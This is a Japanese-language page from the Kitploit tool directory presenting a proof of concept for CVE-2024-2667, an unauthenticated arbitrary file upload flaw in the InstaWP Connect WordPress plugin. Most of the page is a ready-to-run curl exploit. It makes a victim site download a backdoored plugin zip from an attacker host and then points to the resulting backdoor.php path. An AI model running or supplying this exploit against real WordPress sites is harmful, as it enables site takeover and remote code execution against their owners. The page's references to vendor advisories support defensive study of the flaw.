Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-2667 — これはCVE-2024-2667のPOCです (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 未認証の任意ファイルアップロード) | Kitploit
ツール/GitHubGitHub/puvipavan/cve-2024-2667
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト
GitHubpuvipavan/cve-2024-2667

CVE-2024-2667

これはCVE-2024-2667のPOCです (InstaWP Connect – 1-click WP Staging & Migration <= 0.1.0.22 - 未認証の任意ファイルアップロード)

リポジトリを見る
22年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

InstaWP Connect – 1クリックWPステージング&マイグレーション <= 0.1.0.22 - 未認証の任意ファイルアップロード

POC (CURLを使用):

root@kitploit:~
curl --data "api_key=123&override_plugin_zip=http://attacker-domain/malicious-plugin.zip" "http://victim-domain/?rest_route=/instawp-connect/v1/config"
  • api_key -> 有効または無効なAPIキーを自由に使用できます。\
  • override_plugin_zip -> バックドアを含む悪意のあるWordPressプラグインが格納されたzipファイルへのパス。

インポート後、http://victim-domain/wp-content/plugins/malicious-plugin/backdoor.php からバックドアにアクセスできます(ディレクトリ名がmalicious-pluginで、そのディレクトリ配下にbackdoor.phpがある場合)。

参照:

  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/instawp-connect/instawp-connect-1-click-wp-staging-migration-01022-unauthenticated-arbitrary-file-upload
  • https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3061039%40instawp-connect&new=3061039%40instawp-connect&sfp_email=&sfph_mail=
ツールをダウンロード